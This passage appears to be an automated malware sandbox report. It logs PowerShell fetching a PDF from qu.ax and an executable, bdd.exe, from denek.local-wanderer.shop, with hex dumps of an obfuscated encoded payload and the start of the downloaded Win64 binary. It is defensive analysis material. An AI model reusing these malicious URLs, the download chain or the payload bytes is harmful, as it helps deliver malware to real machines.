                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 31 4d 32 63 62 33 33 44 33 30 48 33 32 67 32 63 51 33 32 42 33 39 5a 33 39 4c 32 63 70 33 32 70 33 39 65 33 35 48 32 63 47 33 32 58 33 31 72 33 37 4c 32 63 59 33 32 45 33 33 77 33 30 51 32 63 4f 33 33 46 33 30 64 33 30 4b 32 63 78 33 32 48 33 39 70 33 37 6d 32 63 43 33 32 74 33 39 54 33 33 5a 32 63 68 33 32 71 33 39 50 33 30 44 32 63 6f 33 33 62 33 30 65 33 31 66 32 63 45 33 32 63 33 31 46 33 37 7a 32 63 4b 33 32 55 33 32 42 33 35 77 32 63 6a 33 32 6e 33 32 64 33 31 58 32 63 71 33 32 72 33 35 79 33 30 56 32 63 5a 33 33 78 33 30 6a 33 32 4a 32 63 4c 33 33 6e 33 30 49 33 35 76 32 63 56 33 32 45 33 36 61 33 37 51 32 63 49 33 32 6e 33 36 58 33 38 78 32 63 61 33 32 51 33 31 4d 33 37 6d 32 63 41 33 32 64 33 33 41 33 30 64 32 63 47 33 32 74 33 39 43 33 39 50 32
                                                                        Data Ascii: 1M2cb33D30H32g2cQ32B39Z39L2cp32p39e35H2cG32X31r37L2cY32E33w30Q2cO33F30d30K2cx32H39p37m2cC32t39T33Z2ch32q39P30D2co33b30e31f2cE32c31F37z2cK32U32B35w2cj32n32d31X2cq32r35y30V2cZ33x30j32J2cL33n30I35v2cV32E36a37Q2cI32n36X38x2ca32Q31M37m2cA32d33A30d2cG32t39C39P2
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 77 32 63 63 33 32 45 33 33 6c 33 38 45 32 63 78 33 32 4e 33 33 52 33 35 46 32 63 52 33 32 76 33 35 52 33 35 4c 32 63 6e 33 32 59 33 34 6e 33 31 4c 32 63 52 33 32 6d 33 34 61 33 32 53 32 63 72 33 32 4b 33 33 53 33 37 52 32 63 64 33 32 4f 33 35 51 33 35 53 32 63 44 33 32 61 33 33 6c 33 39 65 32 63 45 33 32 4d 33 35 6e 33 33 57 32 63 77 33 32 47 33 35 6d 33 32 61 32 63 44 33 32 79 33 33 57 33 37 53 32 63 59 33 32 55 33 33 6c 33 37 6f 32 63 7a 33 32 41 33 33 45 33 36 48 32 63 76 33 32 66 33 34 45 33 30 53 32 63 6c 33 32 55 33 33 61 33 36 69 32 63 77 33 32 79 33 33 42 33 35 72 32 63 4b 33 32 6e 33 35 48 33 31 62 32 63 6c 33 32 52 33 33 50 33 33 4b 32 63 41 33 32 7a 33 35 4f 33 32 73 32 63 6f 33 32 41 33 33 73 33 36 49 32 63 63 33 32 63 33 33 54 33 36 43 32 63
                                                                        Data Ascii: w2cc32E33l38E2cx32N33R35F2cR32v35R35L2cn32Y34n31L2cR32m34a32S2cr32K33S37R2cd32O35Q35S2cD32a33l39e2cE32M35n33W2cw32G35m32a2cD32y33W37S2cY32U33l37o2cz32A33E36H2cv32f34E30S2cl32U33a36i2cw32y33B35r2cK32n35H31b2cl32R33P33K2cA32z35O32s2co32A33s36I2cc32c33T36C2c
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 32 63 66 33 32 77 33 33 65 33 35 76 32 63 62 33 32 6a 33 35 51 33 34 67 32 63 46 33 32 70 33 33 4e 33 39 57 32 63 67 33 32 57 33 33 55 33 35 6c 32 63 4e 33 32 44 33 33 52 33 33 77 32 63 53 33 32 5a 33 33 4a 33 33 51 32 63 52 33 32 65 33 33 62 33 33 70 32 63 53 33 32 76 33 35 68 33 35 49 32 63 7a 33 32 57 33 35 71 33 33 56 32 63 6c 33 32 47 33 34 4b 33 32 5a 32 63 6e 33 32 79 33 34 59 33 31 72 32 63 4f 33 32 4c 33 34 41 33 31 4d 32 63 56 33 32 4c 33 34 43 33 32 7a 32 63 58 33 32 45 33 33 67 33 33 47 32 63 6d 33 32 4f 33 33 64 33 38 78 32 63 48 33 32 61 33 35 4f 33 34 4b 32 63 48 33 32 46 33 33 58 33 34 4a 32 63 67 33 32 79 33 35 41 33 30 47 32 63 73 33 32 73 33 33 49 33 39 54 32 63 41 33 32 52 33 33 42 33 36 47 32 63 65 33 32 4f 33 34 55 33 31 47 32 63 74
                                                                        Data Ascii: 2cf32w33e35v2cb32j35Q34g2cF32p33N39W2cg32W33U35l2cN32D33R33w2cS32Z33J33Q2cR32e33b33p2cS32v35h35I2cz32W35q33V2cl32G34K32Z2cn32y34Y31r2cO32L34A31M2cV32L34C32z2cX32E33g33G2cm32O33d38x2cH32a35O34K2cH32F33X34J2cg32y35A30G2cs32s33I39T2cA32R33B36G2ce32O34U31G2ct
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 63 68 33 32 75 33 35 6d 33 35 77 32 63 46 33 32 6c 33 35 78 33 31 71 32 63 65 33 32 57 33 35 77 33 35 55 32 63 66 33 32 69 33 33 62 33 36 6d 32 63 49 33 32 4e 33 33 4e 33 35 72 32 63 5a 33 32 71 33 33 55 33 36 6c 32 63 54 33 32 65 33 35 49 33 33 73 32 63 48 33 32 45 33 33 6a 33 36 58 32 63 6e 33 32 66 33 33 56 33 39 47 32 63 7a 33 32 5a 33 35 55 33 33 6b 32 63 5a 33 32 65 33 35 6a 33 34 78 32 63 69 33 32 6d 33 33 6e 33 37 63 32 63 75 33 32 49 33 35 43 33 30 56 32 63 41 33 32 47 33 35 72 33 33 72 32 63 5a 33 32 41 33 34 63 33 32 61 32 63 63 33 32 46 33 33 69 33 33 61 32 63 6e 33 32 5a 33 33 68 33 35 7a 32 63 4d 33 32 55 33 35 6d 33 34 6a 32 63 73 33 32 63 33 34 52 33 31 75 32 63 47 33 32 58 33 35 43 33 32 68 32 63 72 33 32 67 33 34 78 33 31 79 32 63 42 33
                                                                        Data Ascii: ch32u35m35w2cF32l35x31q2ce32W35w35U2cf32i33b36m2cI32N33N35r2cZ32q33U36l2cT32e35I33s2cH32E33j36X2cn32f33V39G2cz32Z35U33k2cZ32e35j34x2ci32m33n37c2cu32I35C30V2cA32G35r33r2cZ32A34c32a2cc32F33i33a2cn32Z33h35z2cM32U35m34j2cs32c34R31u2cG32X35C32h2cr32g34x31y2cB3
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 4e 33 32 44 33 33 72 33 36 74 32 63 50 33 32 68 33 35 4d 33 33 6d 32 63 54 33 32 59 33 33 6d 33 39 77 32 63 70 33 32 5a 33 33 78 33 39 74 32 63 63 33 32 44 33 33 68 33 36 4e 32 63 6a 33 32 4a 33 34 4c 33 32 6c 32 63 47 33 32 6c 33 35 45 33 35 6c 32 63 53 33 32 68 33 34 6a 33 31 71 32 63 43 33 32 65 33 34 67 33 30 46 32 63 62 33 32 50 33 35 74 33 33 52 32 63 4f 33 32 56 33 33 69 33 34 41 32 63 51 33 32 64 33 35 72 33 35 6d 32 63 46 33 32 51 33 35 6f 33 34 6b 32 63 73 33 32 71 33 33 57 33 39 45 32 63 73 33 32 46 33 35 6d 33 31 65 32 63 64 33 32 61 33 35 54 33 35 6d 32 63 70 33 32 76 33 35 75 33 33 4b 32 63 74 33 32 72 33 33 53 33 33 4d 32 63 4b 33 32 50 33 34 7a 33 32 4e 32 63 61 33 32 4b 33 34 56 33 32 63 32 63 74 33 32 52 33 35 67 33 31 43 32 63 73 33 32
                                                                        Data Ascii: N32D33r36t2cP32h35M33m2cT32Y33m39w2cp32Z33x39t2cc32D33h36N2cj32J34L32l2cG32l35E35l2cS32h34j31q2cC32e34g30F2cb32P35t33R2cO32V33i34A2cQ32d35r35m2cF32Q35o34k2cs32q33W39E2cs32F35m31e2cd32a35T35m2cp32v35u33K2ct32r33S33M2cK32P34z32N2ca32K34V32c2ct32R35g31C2cs32
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 33 32 42 33 33 4e 33 39 79 32 63 5a 33 32 61 33 35 42 33 34 4f 32 63 48 33 32 68 33 35 70 33 31 70 32 63 57 33 32 61 33 35 54 33 30 42 32 63 57 33 32 61 33 33 50 33 39 61 32 63 42 33 32 64 33 34 46 33 30 46 32 63 57 33 32 45 33 33 49 33 36 4a 32 63 76 33 32 61 33 33 46 33 34 56 32 63 57 33 32 63 33 35 5a 33 30 67 32 63 6c 33 32 44 33 33 76 33 38 4e 32 63 4b 33 32 65 33 33 76 33 35 74 32 63 54 33 32 72 33 33 63 33 39 58 32 63 55 33 32 42 33 33 50 33 36 75 32 63 6c 33 32 4b 33 33 78 33 39 43 32 63 77 33 32 48 33 33 63 33 35 55 32 63 52 33 32 73 33 33 53 33 37 67 32 63 63 33 32 55 33 33 54 33 38 74 32 63 42 33 32 6d 33 35 51 33 30 54 32 63 66 33 32 43 33 33 51 33 37 58 32 63 69 33 32 4d 33 34 6d 33 31 65 32 63 63 33 32 6c 33 33 6f 33 36 75 32 63 4c 33 32 4b
                                                                        Data Ascii: 32B33N39y2cZ32a35B34O2cH32h35p31p2cW32a35T30B2cW32a33P39a2cB32d34F30F2cW32E33I36J2cv32a33F34V2cW32c35Z30g2cl32D33v38N2cK32e33v35t2cT32r33c39X2cU32B33P36u2cl32K33x39C2cw32H33c35U2cR32s33S37g2cc32U33T38t2cB32m35Q30T2cf32C33Q37X2ci32M34m31e2cc32l33o36u2cL32K
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 32 76 33 35 7a 33 33 7a 32 63 62 33 32 46 33 33 57 33 37 77 32 63 4b 33 32 53 33 33 45 33 35 52 32 63 69 33 32 4d 33 34 54 33 31 78 32 63 4f 33 32 44 33 35 62 33 31 63 32 63 79 33 32 52 33 33 51 33 34 57 32 63 64 33 32 55 33 35 72 33 34 67 32 63 45 33 32 6d 33 34 45 33 31 57 32 63 62 33 32 42 33 34 5a 33 31 41 32 63 50 33 32 74 33 35 41 33 30 43 32 63 57 33 32 61 33 35 64 33 34 54 32 63 72 33 32 73 33 34 51 33 30 41 32 63 48 33 32 61 33 33 71 33 38 54 32 63 6f 33 32 71 33 33 73 33 39 75 32 63 66 33 32 63 33 35 56 33 31 47 32 63 4f 33 32 71 33 34 73 33 30 58 32 63 4e 33 32 69 33 35 70 33 33 68 32 63 6d 33 32 53 33 34 68 33 31 55 32 63 43 33 32 59 33 33 46 33 34 58 32 63 6e 33 32 77 33 35 66 33 32 6c 32 63 45 33 32 71 33 33 5a 33 35 65 32 63 77 33 32 6b 33
                                                                        Data Ascii: 2v35z33z2cb32F33W37w2cK32S33E35R2ci32M34T31x2cO32D35b31c2cy32R33Q34W2cd32U35r34g2cE32m34E31W2cb32B34Z31A2cP32t35A30C2cW32a35d34T2cr32s34Q30A2cH32a33q38T2co32q33s39u2cf32c35V31G2cO32q34s30X2cN32i35p33h2cm32S34h31U2cC32Y33F34X2cn32w35f32l2cE32q33Z35e2cw32k3
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 4c 33 33 55 33 39 61 32 63 69 33 32 66 33 33 53 33 37 71 32 63 69 33 32 53 33 34 65 33 31 44 32 63 73 33 32 75 33 33 5a 33 38 79 32 63 55 33 32 58 33 33 58 33 38 71 32 63 77 33 32 58 33 33 56 33 34 6e 32 63 52 33 32 42 33 33 48 33 35 47 32 63 48 33 32 52 33 33 73 33 35 6d 32 63 70 33 32 56 33 35 68 33 32 6e 32 63 57 33 32 61 33 35 6e 33 35 4c 32 63 7a 33 32 51 33 35 7a 33 34 66 32 63 74 33 32 59 33 33 79 33 34 62 32 63 44 33 32 45 33 33 53 33 38 58 32 63 65 33 32 6e 33 34 76 33 32 45 32 63 71 33 32 67 33 33 49 33 38 67 32 63 58 33 32 4c 33 35 6a 33 33 51 32 63 5a 33 32 72 33 34 4f 33 31 57 32 63 4e 33 32 6d 33 35 63 33 33 75 32 63 6b 33 32 4d 33 33 71 33 37 66 32 63 58 33 32 70 33 35 75 33 32 74 32 63 44 33 32 67 33 33 44 33 39 44 32 63 7a 33 32 56 33 33
                                                                        Data Ascii: L33U39a2ci32f33S37q2ci32S34e31D2cs32u33Z38y2cU32X33X38q2cw32X33V34n2cR32B33H35G2cH32R33s35m2cp32V35h32n2cW32a35n35L2cz32Q35z34f2ct32Y33y34b2cD32E33S38X2ce32n34v32E2cq32g33I38g2cX32L35j33Q2cZ32r34O31W2cN32m35c33u2ck32M33q37f2cX32p35u32t2cD32g33D39D2cz32V33
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 33 35 62 33 35 4b 32 63 71 33 32 42 33 33 6a 33 38 51 32 63 48 33 32 49 33 35 4f 33 35 46 32 63 68 33 32 77 33 33 6c 33 34 67 32 63 4f 33 32 48 33 35 52 33 31 70 32 63 53 33 32 4f 33 35 53 33 31 4a 32 63 48 33 32 57 33 35 7a 33 30 63 32 63 51 33 32 7a 33 35 52 33 34 70 32 63 65 33 32 57 33 33 47 33 34 76 32 63 4b 33 32 70 33 35 45 33 32 6d 32 63 6f 33 32 53 33 34 73 33 32 6d 32 63 4e 33 32 57 33 33 42 33 38 65 32 63 59 33 32 6b 33 35 43 33 34 51 32 63 48 33 32 70 33 33 4c 33 39 61 32 63 41 33 32 52 33 35 43 33 32 54 32 63 42 33 32 47 33 35 41 33 33 48 32 63 71 33 32 59 33 33 61 33 37 4b 32 63 70 33 32 71 33 35 56 33 33 59 32 63 44 33 32 66 33 33 42 33 37 7a 32 63 56 33 32 66 33 34 76 33 30 6b 32 63 56 33 32 56 33 34 45 33 32 67 32 63 77 33 32 41 33 35 69
                                                                        Data Ascii: 35b35K2cq32B33j38Q2cH32I35O35F2ch32w33l34g2cO32H35R31p2cS32O35S31J2cH32W35z30c2cQ32z35R34p2ce32W33G34v2cK32p35E32m2co32S34s32m2cN32W33B38e2cY32k35C34Q2cH32p33L39a2cA32R35C32T2cB32G35A33H2cq32Y33a37K2cp32q35V33Y2cD32f33B37z2cV32f34v30k2cV32V34E32g2cw32A35i


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.1249714188.245.211.2254436956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-17 07:38:25 UTC64OUTGET /Mcyga.pdf HTTP/1.1
                                                                        Host: qu.ax
                                                                        Connection: Keep-Alive
                                                                        2024-12-17 07:38:25 UTC275INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 17 Dec 2024 07:38:25 GMT
                                                                        Content-Type: application/pdf
                                                                        Content-Length: 5165
                                                                        Connection: close
                                                                        Last-Modified: Thu, 12 Dec 2024 14:53:22 GMT
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Alt-Svc: h3=":443"; ma=604800
                                                                        Accept-Ranges: bytes
                                                                        2024-12-17 07:38:25 UTC5165INData Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 34 33 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 85 54 5d 4f e3 30 10 7c e7 57 ac 78 02 09 99 38 1f 4d 02 4f a1 04 e8 09 da aa 0d 87 4e e2 c5 24 0e f5 29 8d 23 db 29 f0 ef 6f dd b4 a5 69 91 ee ad 75 d6 33 bb 33 b3 76 e1 d7 89 43 82 10 3e 4e 6e 32 b8 bc a3 40 5d e2 38 90 95 90 66 f6 88 d2 90 b8 31 84 71 40 c2 10 b2 02 ce 9e 5a d3 b2 0a 86 b2 2e 45 c1 6b 23 58 25 cc 17 24 ef 8a f3 25 fe 87
                                                                        Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 743>>streamxT]O0|Wx8MON$)#)oiu33vC>Nn2@]8f1q@Z.Ek#X%$%


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.1249716188.114.96.64436956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-17 07:38:27 UTC82OUTGET /bdd.exe HTTP/1.1
                                                                        Host: denek.local-wanderer.shop
                                                                        Connection: Keep-Alive
                                                                        2024-12-17 07:38:28 UTC593INHTTP/1.1 200 OK
                                                                        Date: Tue, 17 Dec 2024 07:38:27 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 14104424
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        ETag: "1b4971205e6226df6b9b11527f70a14f"
                                                                        Last-Modified: Sun, 15 Dec 2024 09:55:28 GMT
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f3540f32b6232c7-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1915&rtt_var=741&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2873&recv_bytes=696&delivery_rate=1455633&cwnd=137&unsent_bytes=0&cid=dbffa4ebe5a71b2d&ts=647&x=0"
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: MZP@!L!This program must be run under Win64$7
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 11 40 00 00 00 00 00 10 05 49 6e 74 36 34 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 02 00 00 00 00 00 00 00 00 88 11 40 00 00 00 00 00 10 06 55 49 6e 74 36 34 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 02 00 00 00 00 00 00 00 b0 11 40 00 00 00 00 00 10 09 4e 61 74 69 76 65 49 6e 74 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 02 00 00 00 00 d8 11 40 00 00 00 00 00 10 0a 4e 61 74 69 76 65 55 49 6e 74 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 02 00 00 00 00 12 40 00 00 00 00 00 04 06 53 69 6e 67 6c 65 00 02 00 00 00 00 00 00 18 12 40 00 00 00 00 00 04 08 45 78 74 65 6e 64 65 64 01 02 00 00 00 00 30 12 40 00 00 00 00 00 04 06 44 6f 75 62 6c 65 01 02 00 00 00 00 00 00 48 12 40 00 00 00 00 00 04 04 52 65 61 6c 01 02 00 00 00 00 00 00 00 00
                                                                        Data Ascii: @Int64@UInt64@NativeInt@NativeUInt@Single@Extended0@DoubleH@Real
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 00 00 00 02 0a 45 6e 74 72 79 43 6f 75 6e 74 02 00 38 11 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 07 5f 46 69 6c 6c 65 72 02 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 02 07 45 6e 74 72 69 65 73 02 00 02 00 00 00 00 00 08 17 40 00 00 00 00 00 0e 07 54 4d 65 74 68 6f 64 10 00 00 00 00 00 00 00 00 02 00 00 00 18 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 04 43 6f 64 65 02 00 18 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b b0 ce 40 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 12 00 17 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 00 17 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 0b d0 ce 40 00 00 00 00 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00
                                                                        Data Ascii: EntryCount8@_FillerEntries@TMethod@Code@Data@&op_Equality@@Left@Right@&op_Inequality
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 18 11 40 00 00 00 00 00 00 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 3b 00 50 d1 40 00 00 00 00 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 20 cc 40 00 00 00 00 00 09 43 6c 61 73 73 54 79 70 65 03 00 00 14 40 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 44 00 30 cc 40 00 00 00 00 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 88 13 40 00 00 00 00 00 20 00 02 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 88 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 49 00 50 cd 40 00 00 00 00 00 0b 43 6c 61 73 73 4e 61 6d 65 49 73 03 00 00 10 40 00 00 00 00 00
                                                                        Data Ascii: Self@Instance;P@CleanupInstance$@Self5 @ClassType@$@SelfD0@ClassName@ Self@@IP@ClassNameIs@
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 40 00 00 00 00 00 06 45 71 75 61 6c 73 03 00 00 10 40 00 00 00 00 00 20 00 02 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 e0 24 40 00 00 00 00 00 00 00 03 4f 62 6a 02 00 02 00 37 00 50 d2 40 00 00 00 00 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 b8 10 40 00 00 00 00 00 18 00 01 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 43 00 90 d6 40 00 00 00 00 00 08 54 6f 53 74 72 69 6e 67 03 00 88 13 40 00 00 00 00 00 20 00 02 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 88 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 6f 00 80 d6 40 00 00 00 00 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 20 14 40 00 00 00 00 00 28 00 03 08 e0 24 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 e0 24 40 00 00 00 00 00 00 00
                                                                        Data Ascii: @Equals@ $@Self$@Obj7P@GetHashCode@$@SelfC@ToString@ $@Self@@o@SafeCallException @($@Self$@
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 00 00 70 64 41 00 00 00 00 00 80 64 41 00 00 00 00 00 e0 d6 40 00 00 00 00 00 b0 d6 40 00 00 00 00 00 a0 64 41 00 00 00 00 00 60 ce 40 00 00 00 00 00 70 d0 40 00 00 00 00 00 80 ce 40 00 00 00 00 00 90 ce 40 00 00 00 00 00 a0 ce 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 b8 10 40 00 00 00 00 00 08 00 00 00 09 46 52 65 66 43 6f 75 6e 74 02 00 00 00 03 00 71 27 40 00 00 00 00 00 4a 00 f6 ff ae 27 40 00 00 00 00 00 4a 00 f7 ff eb 27 40 00 00 00 00 00 4b 00 fa ff 00 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 3d 00 70 64 41 00 00 00 00 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 00 00 00 00 18 00 01 08 28 28 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 3d 00 80 64 41 00 00 00 00 00 11 42 65 66
                                                                        Data Ascii: pdAdA@@dA`@p@@@@@FRefCountq'@J'@J'@KTInterfacedObject=pdAAfterConstruction((@Self=dABef
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 02 00 00 00 00 00 00 00 00 e8 2c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 2d 40 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 2c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 2c 40 00 00 00 00 00 10 00 00 00 00 00 00 00 00 19 40 00 00 00 00 00 40 d2 40 00 00 00 00 00 50 d2 40 00 00 00 00 00 90 d6 40 00 00 00 00 00 80 d6 40 00 00 00 00 00 c0 d6 40 00 00 00 00 00 d0 d6 40 00 00 00 00 00 e0 d6 40 00 00 00 00 00 b0 d6 40 00 00 00 00 00 30 ce 40 00 00 00 00 00 60 ce 40 00 00 00 00 00 70 d0 40 00 00 00 00 00 80 ce 40 00 00 00 00 00 90 ce 40 00 00 00 00 00 a0 ce 40 00 00 00 00 00 00 00 00 00 00 00 10 54 43 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 00 08 2d 40 00 00 00 00 00 07 10 54 43 75 73 74 6f 6d 41 74 74 72
                                                                        Data Ascii: ,@-@,@,@@@@P@@@@@@@0@`@p@@@@TCustomAttribute-@TCustomAttr
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 0d 13 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 41 72 72 61 79 08 00 00 00 01 00 00 00 00 31 40 00 00 00 00 00 01 00 00 00 00 00 00 00 00 02 00 a8 31 40 00 00 00 00 00 14 09 50 56 61 72 41 72 72 61 79 c0 31 40 00 00 00 00 00 02 00 00 00 00 c8 31 40 00 00 00 00 00 0e 09 54 56 61 72 41 72 72 61 79 20 00 00 00 00 00 00 00 00 06 00 00 00 f8 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 f8 10 40 00 00 00 00 00 02 00 00 00 00 00 00 00 02 05 46 6c 61 67 73 02 00 b8 10 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 b8 10 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 18 11 40 00 00 00 00 00 10 00 00 00 00 00 00 00 02 04 44 61 74 61 02 00 68 31 40 00 00
                                                                        Data Ascii: TVarArrayBoundArray1@1@PVarArray1@1@TVarArray @DimCount@Flags@ElementSize@LockCount@Datah1@
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 01 00 a8 11 40 00 00 00 00 00 06 41 56 61 6c 75 65 02 00 02 00 0a b0 70 41 00 00 00 00 00 06 43 72 65 61 74 65 00 00 00 00 00 00 00 00 00 00 01 00 18 11 40 00 00 00 00 00 06 41 56 61 6c 75 65 02 00 02 00 08 c0 70 41 00 00 00 00 00 09 54 6f 50 6f 69 6e 74 65 72 00 00 18 11 40 00 00 00 00 00 00 02 00 08 d0 70 41 00 00 00 00 00 09 54 6f 49 6e 74 65 67 65 72 00 00 a8 11 40 00 00 00 00 00 00 02 00 0b e0 70 41 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 00 78 36 40 00 00 00 00 00 04 4c 65 66 74 02 00 00 78 36 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 0b 00 71 41 00 00 00 00 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 00 78 36 40 00 00 00 00 00 04 4c
                                                                        Data Ascii: @AValuepACreate@AValuepAToPointer@pAToInteger@pA&op_Equality@x6@Leftx6@RightqA&op_Inequality@x6@L
                                                                        2024-12-17 07:38:28 UTC1369INData Raw: 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 32 00 d0 71 41 00 00 00 00 00 09 4f 75 74 53 74 72 69 6e 67 03 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 34 00 e0 71 41 00 00 00 00 00 0b 49 6e 4f 75 74 53 74 72 69 6e 67 03 00 c0 12 40 00 00 00 00 00 18 00 01 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 02 00 3e 00 f0 71 41 00 00 00 00 00 06 41 73 41 6e 73 69 03 00 b8 13 40 00 00 00 00 00 20 00 02 02 88 13 40 00 00 00 00 00 00 00 01 53 02 00 40 b8 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 3e 00 10 72 41 00 00 00 00 00 06 41 73 41 6e 73 69 03 00 b8 13 40 00 00 00 00 00 20 00 02 00 c0 12 40 00 00 00 00 00 00 00 01 53 02 00 40 b8 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00
